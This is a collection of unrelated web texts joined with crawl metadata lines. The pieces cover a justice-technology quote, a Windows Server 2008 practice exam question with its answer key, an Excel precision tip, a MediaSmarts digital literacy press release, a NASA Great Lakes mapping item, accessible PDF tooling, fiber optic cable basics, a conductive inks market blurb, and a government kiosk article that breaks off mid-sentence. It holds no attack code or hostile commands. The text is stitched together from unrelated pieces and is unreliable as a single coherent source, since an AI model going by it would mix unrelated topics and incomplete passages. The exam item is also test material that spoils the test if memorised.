Zittrain, executive director of Harvard Law School's Berkman Center for Internet and Society, summed up the sometimes glacier-like process best when he observed: "Government has not moved into the digital age as quickly as private industry. Sometimes, it is a question of money; sometimes, the lack of the profit motive to spur faster change. But it is always moving. I wouldn't take the fact that the justice community's early steps have been particularly fitful to mean government will always be in the technological swamp. Remember, the Internet is only 4 to 5 years old and it has already changed the world; and we haven't seen anything yet." Justice and Technology Editor Ray Dussault is also a research director for the Law Enforcement Technology Acquisition Project. E-mail
<urn:uuid:0804b35d-0167-4b79-baee-02780b7667b6>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/LAWLiterally-Arresting-Wireless.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00122-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963238
2,521
2.515625
3
Design for Business Continuity and Data Availability These questions are based on 70-647: PRO: Windows Server 2008, Enterprise Administrator Self Test Software Practice Test Objective: Design for business continuity and data availability. Sub-objective: Design for data management and data access. Single answer, multiple-choice You are the administrator for a company that hosts a Web site used for customers to order products and view merchandise. All servers are running Windows Server 2008. Due to increased workload, you plan to implement a second server to house the same Web site. Which of the following redundancy methods would eliminate a single point of failure and provide the users with the most transparent failover in the case of a server failure? - Use round-robin DNS (RRDNS). - Install a single-load balancing switch. - Use Network Load Balancing. - Install redundant network cards. C. Use Network Load Balancing. Network Load Balancing (NLB) would eliminate a single point of failure and provide the users with the most transparent failover in the case of a server failure. NLB is a component in the Windows Server 2008 operating system that balances the workload among multiple servers in an NLB cluster. It provides smooth and automatic failover for a user when the node being utilized fails. Round-robin DNS (RRDNS) also can be used to balance the workload between servers hosting the same site. However, failover is less than smooth for the user and usually requires refreshing the browser. It involves creating DNS records that map the site name to multiple addresses and then manually configuring distribution of the workload. Load-balancing switches are another way to balance workload at the MAC address level. The switches are quite expensive, and a single one would itself be a single point of failure. Installing redundant network cards would provide neither load balancing nor redundancy. It would only allow a single machine to continue to accept work if one of cards stopped working and could improve the performance.
<urn:uuid:3a0d327e-b838-42ce-b745-9aab0062dcb1>
CC-MAIN-2017-04
http://certmag.com/design-for-business-continuity-and-data-availability/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280763.38/warc/CC-MAIN-20170116095120-00030-ip-10-171-10-70.ec2.internal.warc.gz
en
0.880687
411
2.578125
3
Okay, this is just plain weird: That calculation is taking a raw number “8” and multiplying it by the result of a series of calculations found in the second cell with the result of “$20.55”. The end result states that 8 * 20.55 is 164.38 which for most of us seems to be really wrong. Especially for a program that is supposed to do this right! So, just how do we “fix” this? A quick search turned up the culprit: Under File –> Tools –> Advanced we find the Set precision as displayed setting. When we enable it and click OK Excel becomes quite unhappy about it: Data will permanently lose accuracy. Well, be that as it may, that “loss in accuracy” helps the old human brain to see what it really needs to see: That is the expected result! This works for all versions of Excel too. The solution was found here: Microsoft Small Business Specialists Co-Author: SBS 2008 Blueprint Book
<urn:uuid:b69e3c3f-d9d3-42be-ab9a-10ddb0c0dae8>
CC-MAIN-2017-04
http://blog.mpecsinc.ca/2010/04/excel-2010-multiplies-cells-containing.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00545-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93521
221
3.203125
3
OTTAWA, ONTARIO--(Marketwired - March 31, 2014) - Canadian youth are not as digitally literate as adults may think they are, according to new research released today by MediaSmarts. Though today's young people have grown up immersed in digital media, they still rely on parents and teachers to help them advance their skills in areas such as searching and verifying online information. MediaSmarts, a Canadian not-for-profit organization, surveyed over 5,400 students in classrooms across the country on their Internet behaviours and attitudes for its Young Canadians in a Wired World study. The fourth report from the survey findings - Experts or Amateurs? Gauging Young Canadians' Digital Literacy Skills - explores the level of young people's digital literacy, how they are learning these skills and how well digital technologies are being used in classrooms to support digital literacy. The research shows that although students are actively engaging with digital media through social networking, gaming and video streaming, they are learning and applying only the digital skills they consider essential to the context of the task. For example, across all age groups, youth use a variety of strategies to verify online information, but will often only put their skills to use if they see an immediate benefit to doing so, such as for a school project. Youth are eager to learn more skills, with teachers being one of their main sources of information; however, there are often technological barriers in the classroom such as blocked websites and a lack of access to digital devices. "Young people are mistakenly considered experts in digital technologies because they're so highly connected, but they are still lacking many essential digital literacy skills," says Jane Tallim, Co-Executive Director of MediaSmarts, "Parents and teachers are playing a crucial role in teaching them to navigate the digital world, but we need to ensure that digital literacy programs reflect youth's lived experiences so they will find the skills relevant enough to learn and apply them." Key findings include: - 53% of girls have learned how to search for information online from teachers compared to 38 percent of boys. - Parents (47%) and teachers (45%) are the main sources for learning about searching for information online. - 61% of students use more than one search engine to find information online. - 35% of students in grades 7-11 use advanced search engine tools. - 80% of students have received instruction in evaluating and authenticating online information. - 46% of students (29% in Grade 4 and 72% in Grade 11) agree with the statement, "Downloading music, TV shows or movies illegally is not a big deal". - 36% say that they have had trouble finding something they need for their school work due to filtering software. - 41% of Grade 9 students say their teachers have used social media to help them learn. To view the full report, infographic and slide show, visit http://mediasmarts.ca/ycww/experts-or-amateurs-gauging-young-canadians-digital-literacy-skills. Follow the conversation using hashtag #YCWW. Young Canadians in a Wired World - Phase III: Experts or Amateurs? Gauging Young Canadians' Digital Literacy Skills was made possible by financial contributions from the Canadian Internet Registration Authority, the Office of the Privacy Commissioner of Canada and the Alberta Teachers' Association. Previous reports based on the Young Canadians in a Wired World student survey data focused on cyberbullying, online privacy and online interactions. They can be downloaded at http://mediasmarts.ca/ycww. Future reports will look at offensive content and online relationships. MediaSmarts is a Canadian not-for-profit centre for digital and media literacy. Its vision is that young people have the critical thinking skills to engage with media as active and informed digital citizens.
<urn:uuid:1cc3b75b-0cad-4600-a6a4-e29bc2490fa2>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/digital-natives-turn-parents-teachers-digital-literacy-skills-new-study-finds-1894218.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947925
788
3.421875
3
Providing information in accessible format to people with disabilities is becoming increasingly important as organisations better understand the financial, moral, and legal benefits. Progress can already be seen in the design of some websites but less progress has been made in providing accessible PDF documents. This is partly an historical problem because many years ago there was no accessible PDF format. More recently it was felt that there were no good tools for creating accessible PDF. Even now there is still a common belief that creating accessible PDF is both difficult and expensive. In reality there are now tools available to do the job well, even if the choice is fairly limited. Up to now creating accessible PDF has been considered a two-stage process: - Converting the source document into a tagged PDF. This function is either built-in, or available as a plug-in, to Open Office, Lotus Symphony, or Microsoft Office. - Testing and re-mediating this tagged PDF to make it fully accessible. These functions are provided by Adobe Acrobat or NetCentric CommonLook. When an error is identified there are two possible methods available for fixing it. The simple way is to use the tool to fix the PDF. The other is to go back to the source and make changes that will produce a better output next time. The advantage of changing the source is that future versions of the document will not create the error. The problem with this method is that it is relatively expensive; the change has to be made by the author and then the whole document retested and potentially remediated and this cycle may have to be repeated more than once. This is a classic example of picking up errors late in a development cycle with the inevitable high costs. This is a well documented problem in software development where it is generally agreed that the cost of fixing an error goes up by an order of magnitude between coding and testing. Only being able to check for accessibility in the testing and remediating stage is rather as if spell-check was only available to the editor and not to the author of a document. If that was the case the editor would have to mark-up the document with the spelling mistakes and pass it back to the author for updates. What was needed was a spell-checker for accessibility, an 'access-checker', that would pick up any issues in the source document which might convert incorrectly or incompletely. At CSUN NetCentric announced the beta version of PAW (PDF Accessibility Wizard) for MS Word that provides exactly this function. PAW is an add-in to Microsoft Office Word 2007. The checks and tests are started by a 'save to accessible PDF' command. This command runs all the checks, issues any prompts for additional information, and then creates the final accessible PDF file. For example if the author has inserted a table into the document PAW will prompt for a description of the table and information about column and row headings. Where the information can be added to the source Word document this will be updated, in the case of information which cannot be added to the source (such as table row headers) then this will be noted separately and reused if the save command is repeated on the same file. The output of the save is thus both an accessible PDF and an improved Word document. The improved Word document could then be used to create a DAISY file providing an alternative accessible format. The checks and prompts are based on NetCentric's experience with the testing tool in Common Look for Adobe for Section 508. Having a deep understanding of what checks need to be made by the editor, to ensure compliance, made it easier to develop a comprehensive set of prompts and checks for the author. An author answering the prompts at the time of writing, when the ideas are fresh in their mind, should be much easier than having to add them in at a later date, when the document has to be reread to refresh the thoughts. The author should be much more willing to add the extra as part of the flow rather than as a later distraction. The advantage of this solution is that it is one step instead of two, because the conversion, testing and remediation are all performed together. Besides the obvious requirement for Word 2007 there are no other prerequisites. The access-checker will reduce the number of iterations between the author and the editor hence reducing the overall development time and the total cost. The lack of prerequisite software will also reduce the total cost of a Word to accessible PDF solution. Bloor Research believes that it should pay for itself very rapidly in reduced staff and software costs.
<urn:uuid:3051e850-01dd-4e18-af48-ee1023a87931>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/access-checker-for-microsoft-office/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00113-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946371
930
2.78125
3
New NASA site orbits around manned space flight Site includes Web 2.0 tools for interacting with NASA - By Doug Beizer - Jun 11, 2009 NASA has launched a new Web site designed to let the public participate in a review of planned human space flights The site provides access to documents and information, and will allow the public to track activities of a committee examining manned space flight, NASA said June 5. Visitors also can get updates and provide input through Web 2.0 tools such as Twitter, Flickr, polls and Really Simple Syndication feeds. The NASA committee associated with the Web site is the Review of U.S. Human Space Flight Plans Committee. The public can submit questions, upload documents or comment about topics relevant to the committee’s operations. The committee will conduct public meetings during the course of the review, NASA said. The first meeting will be held June 17 in Washington. Doug Beizer is a staff writer for Federal Computer Week.
<urn:uuid:2fd9330e-8f68-40b8-b050-1ef4118fea7f>
CC-MAIN-2017-04
https://fcw.com/articles/2009/06/11/nasa-manned-space-flight-site.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00021-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918054
200
2.578125
3
Optical fibers are strands of super pure flexible glass used in telecommunications and they could be as thin as human hair. These fine chain transit digital signals in the form of light. A two layer plastic coating is presented in each fiber so that they reflect light back to the core and move it forward without too much loss. There are many such fiber is arranged in the package a set of functions and these package called optical fiber cable. A cable buffer coating again final outer for additional protection from water and other damaging agents. Fiber optic communication in mobile through two main types of fiber optic cable. Laser light through the single mode fiber optic cable transmission signal and the multimode cable, LEDs or light-emitting diodes do this job. Multimode cable thicker, heavier than single-mode cable. Basic principle of total internal reflection works to transmit light signals in optical fiber communication from origin to destination. In addition to the cable itself, other parts are very basic component system. A “transmitter” is a device generates coded light signal through the cable. When the optical signals in mobile distance, they will become weak, now an “optic regenerator” they copy the complete signal and regeneration stream connected to the full in the future. A shorter version of the optical cable may not need an optic nerve regeneration. To reach its destination, an “optical receiver” receives coded light-signals and decodes them into a readable form. Apart from telecommunications, the technology of optical fiber communication comes handy in Internet signals, medical imaging, and inspecting plumbing and sewer lines and even in digital television connections. Optical fiber cables are more helpful than conventional copper cables. What’s the advantages of fiber optic cables? Fiber optic cables are more cost-effective than copper wire. By replacing copper with optical fibers, the service providers as well as customers save a lot of money. The higher carrying capacity of optical fibers over copper wire is another advantage. Transmissions of more signals at a time without much interference is of great help to the customers. Flexible, lighter and less bulky In most urban places, there is an acute shortage of space. This limited available space is shared among subways, sewer lines and power wires. Being lighter and less bulky, they can fit in crowded and smaller places, it is easy to transport them to different places of installation. Flexibility is their gifted advantage, this very character makes them move through every corners quite easily. Lesser degradation of signals Fiber optic cable can preserve signal strength over a remote compared than traditional electric wire. Optical signal transmission through the cable will not interfere with each other so that you receive signals, easier and more clear understanding. Use less power Signal generator is used for optical fiber communication use less energy and thus save considerable amount of money on power. Since the signals are digital in nature, the computer networks pick them easily. Since optical fibes use light for signal transmissions instead of electricity, incidences of the hazards and electric shocks are ruled out. This makes them safer than conventional wires. Such being the amazing capabilities of bulk fiber optic cable, the new possibilities in the field optical fiber communication are always on the rise.
<urn:uuid:43530b2d-3fb3-426b-afcf-474bef5610a4>
CC-MAIN-2017-04
http://www.fs.com/blog/what-is-the-advantages-of-fiber-optic-cables.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00417-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924393
656
3.4375
3
Production of tomatoes is the highest with a total of 159,805 tons production and acreage of 7,170 hectare. The second vegetable crop is cabbage and third crop is onion. Carrots are a minor crop with a production of 4,029 tons. Other vegetables are for instance eggplant, cauliflower, beans and indigenous vegetables like amaranth and okra. Of the horticultural regions, Iringa shows the highest production and acreage.Also yield levels in this region are high compared to the other regions. For home consumption only 10% of the yield is used. The remaining is for selling but for all kind of vegetables losses are high. Although no good documentation is available estimated is that about 31% is lost leaving only 59% for selling. Losses are caused by pest and diseases, inadequate sorting/grading, rough handling, lack of cooled storage facilities and lack of adequate packing material. Besides this also a good quality control system and grading system is lacking. Only 13% of the farmers perform some sort of grading where only rotten or misshaped fruits are removed. Mango is one of the common fruits in Asia, Central and South America and Africa. In Tanzania mango is on the list of five top most popular fruits, i.e., bananas, oranges, pineapples, mangos and pear. There are number of products made from mango, such as juice, pulp, pickles, mango flavouring, mango kernel oil, and powder. These products have been well introduced and accepted in a variety of market segments around the world. In Tanzania and Africa in general, processing of mango is less developed than in other continents, and the varieties grown are generally most suitable for local markets. Processed mango products, e.g., dried fruit, jam, jellies, syrup and other mango products are fast gaining market share and commanding better prices than other tropical fruits. Access to the EU and USA market is subject to stringent standards and certification requirements (GLOBAL GAP, HACCP and other Ethical Trading Initiatives (ETI)), which makes export of mango from some countries, including Tanzania, not possible at this time.
<urn:uuid:eeb70ab5-00f2-4e4a-9aba-dbe375d5a8b4>
CC-MAIN-2017-04
https://www.mordorintelligence.com/industry-reports/fruits-and-vegetables-industry-in-tanzania-industry
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00049-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945662
440
2.8125
3
11 months of the year have 30 or 31 days. Why not take two of the months with 31 days and round out February? Then seven months would have 30 days and five would have 31? It makes sense, but that's not always how history works. Find out the real reason why February has 28 days - most of the time.
<urn:uuid:52a447f1-3629-406f-a2ed-031e974101bf>
CC-MAIN-2017-04
http://videos.komando.com/2008/11/28/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00471-ip-10-171-10-70.ec2.internal.warc.gz
en
0.986103
68
2.921875
3
NOAA adds Great Lakes images - By Doug Beizer - Apr 24, 2009 The National Oceanic and Atmospheric Administration helped develop a new feature on Google Earth that lets visitors view detailed three-dimensional mapping of the Great Lakes, agency officials announced April 23. Visitors to the new Great Lakes feature can explore the canyons and sandbars in eastern Lake Superior, the Lake Michigan mid-lake reef complex, and the old river channel – now underwater – that once connected Lakes Michigan and Huron at the Straits of Mackinac, NOAA officials said. “NOAA’s data opens up the fascinating world underneath the planet’s largest fresh water system,” said Richard Spinrad, NOAA assistant administrator for oceanic and atmospheric research and a Google advisory board member. NOAA’s Great Lakes Environmental Research Laboratory in Ann Arbor, Mich., worked with the National Geophysical Data Center in Boulder, Colo., to produce the Google Earth tour to highlight the coastal and subsurface features “I expect that others will see the potential of this tool and create their own Great Lakes tours and expand the possibilities,” said Marie Colton, GLERL acting director. The Great Lakes information was compiled from archival U.S. and Canadian soundings that span more than 75 years. David Schwab, a physical oceanographer at GLERL, generated a map of lake depths from the joint project and provided it to Google to form the basis for the Great Lakes topography. To highlight some of the coastal and subsurface features of the Great Lakes, the NOAA Great Lakes Environmental Research Laboratory created a narrated Google Earth tour. Doug Beizer is a staff writer for Federal Computer Week.
<urn:uuid:f8ce122a-409e-455b-bf6d-6bf628e11ce5>
CC-MAIN-2017-04
https://fcw.com/articles/2009/04/24/web-great-lakes.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00553-ip-10-171-10-70.ec2.internal.warc.gz
en
0.88394
356
2.84375
3
Integration testing examines if the parts of an application are able to communicate and function together—and if so, how well. There are many approaches to a successful integration test, but the commonly used “mocks/in-memory” testing method may not provide the same quality results that it does when working on the unit testing level. Developers may look at using in-memory testing to save time and perform more tests, but this approach removes much of what’s important in an integration test. Integration testing approaches that utilize the application’s actual database hardware infrastructure or simulated recreation provide much more reliable, real-world, easily measurable results. Integration Testing with Mocks/In-Memory Businesses often go with mocks/in-memory testing in the development process because it’s faster. Utilizing mocked in-memory, or RAM-stored, database information for a test essentially eliminates seek-time delays associated with using a disk-based database. This method is extremely popular for unit testing because the tests are self-contained. If your application is already running on an in-memory database, then this method will provide accurate results. However, in-memory tests utilize fewer CPU instructions and don’t always support the same SQL functions the actual testing database uses. Therefore, you won’t get accurate performance data. Repeated delays may add up to performance issues which would show up in real world use, but not on the in-memory test. Swapping in real data parts in place of information coming from an actual server is not only problematic because of its inaccurate performance results, but also because these tests are difficult to maintain. Additionally, using in-memory testing to initiate and load multiple tests at once can cause problems. While this method saves time, it can cause tests to overlap each other and interfere with results. Problems arise with in-memory testing when it doesn’t accurately represent the production environment, which makes it difficult to recommend for the integration testing step. It does not make a lot of sense to work around these additional issues when the test itself already fails to provide accurate results. Using an Actual Database The most accurate results come from utilizing the actual hardware database infrastructure in the test. If the actual database is unavailable or not yet implemented, the development team can use a similar database server to run the test. This method eliminates all performance gains from the in-memory tests and produces tangible, real-world results. Additionally, running the test from an alternative data source means the test results won’t provide the same level of insight into the application architecture as using a disk-based database. However, tests will take much longer to perform when running on a disk-based platform compared to an in-memory platform, meaning the development team will not be able to conduct as many tests within the same time period. This can be a drawback for regular tests, but the importance of the integration testing step in the development process means it’s a wise investment to get it right. Development teams can improve test times by implementing more efficient database caching techniques for the test. The main purpose of integration testing is to measure the interface between different parts of the application. Many of these parts may require making calls to the database, which takes time and is subject to communication problems, so replacing the actual database with an in-memory solution tests a platform that performs differently. If your business is looking to improve its application development practices, don’t hesitate to contact the integration testing experts at Apica.
<urn:uuid:c8334b24-78e7-47cc-a733-870d25507944>
CC-MAIN-2017-04
https://www.apicasystem.com/blog/integration-testing-process-big-applications-mocksin-memory-tests-good-idea/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00489-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918255
727
2.5625
3
Create and execute a communication plan to ensure that the right messages are properly communicated. A communications plan is used to make sure that current information about program progress and benefits is provided in an effective manner to all pertinent internal and external parties. The plan should include: - What is to be communicated (message content) - Who is responsible and accountable for delivering the message - Who the recipients are - When and how often (frequency) the message is to be delivered - What medium is to be used to deliver the message Effective communication is critical for garnering support, acceptance, and participation from stakeholder groups.
<urn:uuid:a2ba1cd8-0f04-476d-91f0-a9739d32da8c>
CC-MAIN-2017-04
https://www.infotech.com/research/revenue-generation-program-communication-plan-template
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00215-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911476
126
2.671875
3
Mars Rover Curiosity's Rock-Blasting Laser Reaches Milestone The laser has been fired 100,000 times so far, helping scientists uncover more amazing details about the Martian surface.Since landing on Mars Aug. 6, 2012, NASA's Curiosity Mars rover has been exploring the planet's surface and conducting science experiments on soil and rocks. One of the mission's key milestones was reached this week when the rover's specialized on-board laser was fired for the 100,000th time as it continues to explore the planet's history. The laser, called ChemCam, is shot each time at a rock, creating a little ball of plasma or debris, Roger Wiens, the principal investigator of the ChemCam team, told eWEEK. "It abrades some material off of the rock's surface, like a little ball of flame," said Wiens, who is a planetary scientist at the Los Alamos National Laboratory, where the laser was developed. After each shot, special instruments on the rover capture the spectral signatures of the laser firing, which are used to identify the elements that make up the soil on Mars, he said. Photographs are also taken to document the laser firing and to build a history of the experiments. The ChemCam laser marks the first time that scientists on Earth have been able to do this kind of research on Mars, said Wiens. A previous Phoenix lander sent to Mars had a laser, but it was aimed into the planet's atmosphere and couldn't collect information about the rocks on Mars. Other Mars lander missions used a robotic arm to scoop up soil for analysis, but that limited data collection to materials that could be grabbed by the arm, said Wiens. "So it took more effort than just point and shoot," like researchers are able to do with the laser. "This mission provides much more data collection."
<urn:uuid:3d190d8f-9120-4766-b94e-2ca06c0fbdce>
CC-MAIN-2017-04
http://www.eweek.com/cloud/mars-rover-curiositys-rock-blasting-laser-reaches-milestone.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00123-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952942
375
3.71875
4
Applies to Kaspersky Small Office Security 2 for Personal Comuter All network connections on your computer are monitored by Firewall. Firewall assigns a specific status to each connection and applies various rules for filtering of network activity depending on that status, thus, it allows or blocks a network activity. Firewall works based on rules of two types: packet rules and rules for applications. Packet rules have a higher priority compared to the application rules. If both packet rules and application rules are applied to the same type of network activity, this network activity will be processed using the batch rules. Packet rules are used in order to restrict packets transfering regardless applications. Creating a network rule In order to create packet rule, perform the following actions: - open the main application window - on the upper right hand corner of the window, click Settings - on the upper part of the Settings window, select Protection - on the left hand part of the Settings window under Protection, select Firewall make sure that the Firewall component is enabled (the Enable Firewall box is checked) on the right hand part of the Settings window, click Settings on the Firewall window ,go to the Filtering rules tab click on the Add link. The Network rule window appears specify the required parameters once the required parameters are specified, click on the OK button click OK on the Firewall window click OK on the Settings window close the main application window. Network rule parameters While creating a network rule you can specify an action performed by Firewall if it detects the network activity: The Allow or Block rules can be logged. In order to do this, check the Log events box. If you want to create a packet rule you need to set network service. Network service contains types of network activities, which are restricted according to a network rule. You can select the type of network activity or create a new by clicking the Add link. Network service includes the following parameters: Protocol. Firewall restricts connections via TCP and UDP protocols. Direction. Firewall controls connections with the following directions: Inbound (stream). The rule is for network connections created from another computer. Inbound / Outbound. The rule is for inbound and outbound data packets and data streams regardless the direction. Outbound (stream). The rule is only for network connections created by your computer. Remote and Local ports. You can specify ports which are used by your and remote computers for TCP and UDP protocols. These ports will be controlled by Firewall. You can also specify network addresses. You can use an IP address as the network address or specify the network status. In the latter case the addresses will be copied from all networks that are connected and have the specified status at the moment. You can find detailed instructions on how to set a range of IP addresses in KB6480. You can select one of the following addresses types: Addresses from group. The rule will be created for IP addresses from the specified range of IP addresses. Select one of the address groups. If there are no address groups you want to add, you can create a new group. In order to do this, click the Add link in the lower part of the section and in the Network addresses window that will open specify the addresses.
<urn:uuid:15cd4f24-1a73-466a-b616-02fcd4dd58c8>
CC-MAIN-2017-04
http://support.kaspersky.com/5483
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280763.38/warc/CC-MAIN-20170116095120-00031-ip-10-171-10-70.ec2.internal.warc.gz
en
0.876725
685
3.171875
3
Recently, China has tightened its control over VPNs (virtual private networks), the systems that allowed many of its people to access banned sites. Basically, a VPN is a private network that sends and receives data through public systems. It remains private through a combination of dedicated connections and encryption, and is like a shield through which users can view the internet away from prying eyes. In the Western world, many users employ VPNs to surf in complete privacy, ensuring that their browsing data is protected by encryption at all times. Considering the new proposed legislation in the UK that would force all ISPs to save all of the browsing data of all of their users, and the prevalence of data-logging software in general, it’s easy to see why many users may choose to use a VPN simply as a matter of principle. In China, however, VPNs are usually used to get around the Great Firewall and access censored information in safety. They are also often used by banks and other businesses to ensure the complete privacy of their data exchange. Currently, many connections are being terminated where a VPN is detected. While VPN providers can work around these blockages, Chinese censors can identify the work-around and block it just as quickly. Whether this is or is not the case remains to be seen, but it seems as though the situation is an unacceptable one for many businesses that simply cannot operate without the security of a VPN. Rather than risk having their corporate communications glimpsed by competitors (who could easily utilise underhanded tactics to gain sensitive information if it wasn’t enclosed in the safety of a VPN), many international companies will choose to withdraw from China altogether. Additionally, many international businesses operating in China rely on access to the international internet services they are able to reach through a VPN. Without these services, they would be unable to operate. This may seem like a strange move for the Chinese authorities to make, considering the impact it could have on their economy, but perhaps it is a sacrifice they are willing to make if it means mainland Chinese internet users are forced to rely on the domestic e-commerce industry. Considered from this angle, it does in fact seem like a direct attack on international business, and a way of protecting their economy from the dominance of international corporations. The Chinese market is a significant one. With 500 million users, it’s not surprising that Mark Zuckerberg of Facebook is said to be in negotiations to bring a version of Facebook to the country (having recently been spotted in China with his wife ). In the absence of major web services such as Facebook, Twitter, and YouTube, China has, however, developed its own versions that comply with the censor’s demands. The US is known for being vocal about its advocacy of free speech. Most recently, they were the first to refuse to sign the updated version of the ITU treaty proposed at the WCIT (world conference on international telecommunications), supposedly because it would have allowed for greater levels of governmental control over the internet. As the world leader in the area of e-commerce and social media, the US is the country that has the most to lose out from censorship. While they may well hold the principle of free speech in high regard, it’s worth bearing in mind that this is less about morals and more about economics. There is no doubt that users in China will find a way to circumvent these new blockages and access the international internet as they always have done. In April last year, security experts publicly posted a guide to getting around the Chinese blockage of the Tor network , because each time the Great Firewall is upgraded, the ways around it are simply modified too. These ways are illegal, however, which means that international businesses won’t legitimately be able to use these methods. This new situation in China may seem like another small gaining of ground for censorship, but as Chinese dissident artist Ai Weiwei said in The Guardian last year, ultimately China’s leadership will have to understand that they simply "can’t control the Internet unless they shut it off", just as they can’t control the free flow of ideas. In Weiwei’s words, "ultimately the Internet is uncontrollable. And if the Internet is uncontrollable, freedom will win."
<urn:uuid:534c6b2e-56c2-4faa-9990-b744f88f7d48>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/blogs/censorship-in-china-what-is-really-at-stake/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00482-ip-10-171-10-70.ec2.internal.warc.gz
en
0.969195
874
2.96875
3
A conductive ink (CI) is a thermoplastic viscous paste that conducts electricity by inculcating conductive materials such as silver and copper. This ink comprises binder, conductor, solvent, and surfactants used during its manufacturing process. The North America conductive inks market was valued at $291.6 million in 2012, and is projected to reach $378.8 million by 2018, growing at a CAGR of 5.5 % from 2013. Photovoltaic is the major application of conductive inks in North America market, closely followed by membrane switches. The binder helps to clutch together all conductive materials in the ink and provides a strong support to the product. It is particularly used in the applications which require high reliability and flexibility. The conductor is another important part of the ink which allows the passage of electricity. The different types of conductors used in conductive inks are silver, copper, nickel, aluminum, and so on. Similarly, the solvent is used for the formation of solution, whereas the surfactants help in uniform mixing of the ink. Conductive inks have various applications such as photovoltaic, membrane switches, automotive, RFID/smart packaging, bio-sensors, printed circuit boards, and other applications. The North American chemical industry is a significant part of the country’s economy. U.S. is the largest chemical producer in North America, followed by Mexico, and Canada. In the past, most of North America’s chemical industry growth was driven by domestic sales, but these days, the country’s growth is shared dependent on both the domestic and the export market. Silver flakes conductive inks have huge demand in North America conductive inks market, on account of increasing usage in end-user industries. The key countries covered in North America conductive inks market are U.S., Canada, and Others. The types of conductive inks studied include conductive silver ink, conductive copper ink, conductive copper ink, conductive polymers, carbon nanotube ink, dielectric inks, carbon/grapheme ink, and others. Further, as a part of qualitative analysis, the North America conductive inks market research report provides a comprehensive review of the important drivers, restraints, opportunities, and burning issues in the conductive inks market. The North America conductive inks market report also provides an extensive competitive landscape of the companies operating in this market. It also includes the company profiles of and competitive strategies adopted by various market players, including Applied nanotech holdings Inc. (U.S.), Conductive Compounds Inc. (U.S.), Creative Materials Inc. (U.S.), and E.I. Du Pont De Nemours and Company (U.S.). With Market data, you can also customize MMM assessments that meet your Company’s specific needs. Customize to get comprehensive industry standards and deep dive analysis of the following parameters: - Market size and forecast (Deep Analysis and Scope) - Competitive landscape with a detailed comparison of portfolio of each company mapped at the regional- and country-level - Analysis of Forward chain integration as well as backward chain integration to understand the approach of business prevailing in the North America Conductive inks market - Detailed analysis of Competitive Strategies like new product Launch, expansion, Merger & acquisitions etc. adopted by various companies and their impact on North America Conductive inks Market - Detailed Analysis of various drivers and restraints with their impact on the North America Conductive inks Market - Upcoming opportunities in conductive inks market - Trade data of CI market - SWOT for top companies in conductive inks market - Porters 5 force analysis for conductive inks market - PESTLE analysis for major countries in conductive inks market - New technology trends of the CI market Please fill in the form below to receive a free copy of the Summary of this Report Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement
<urn:uuid:2007a283-377d-4f69-b24e-9b4f9c269b4e>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market/north-america-conductive-inks-1828770663.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00298-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931972
855
2.828125
3
In the early 1990s, many federal and state agencies promoted kiosks as an effective way of disseminating information and government services to the public. In practice, deployment proved more complex than first envisioned. In addition to shrinking public-sector budgets, kiosk programs were plagued by a number of factors -- chiefly, the widespread notion of the Web as a competing medium, the high cost of kiosk deployment, lengthy procurement cycles and the two- or three- year pilot project required to come up with a kiosk system of value to the public. According to Summit Research Associates President Francie Mendelsohn, kiosk projects also faltered from a lack of clear planning and too little thought to applications, design and maintenance. Ironically, these same factors later became learning experiences that contributed to successful kiosk models developed by Georgia; Ontario, Canada; New York City; Texas; and the federal Department of Housing and Urban Development (HUD). For the purposes of this discussion, "kiosk" refers to Internet-enabled, interactive kiosks designed primarily to disseminate information and government services to the public. Influence of the Web Initially, many considered the Web a simpler, more cost-effective method of providing information for citizens than public-access kiosks. Government agencies that might have supported kiosk programs shifted resources into developing Web sites. By 1996, high-visibility kiosk projects in several states were stalled or shelved altogether. To some, the kiosk was another Betamax. North Communications Senior Vice President of Marketing Rick Rommel said this view of the Web is short-sighted. "The Web is not a competitor to kiosk deployment; it is a synergistic technology. It enhances 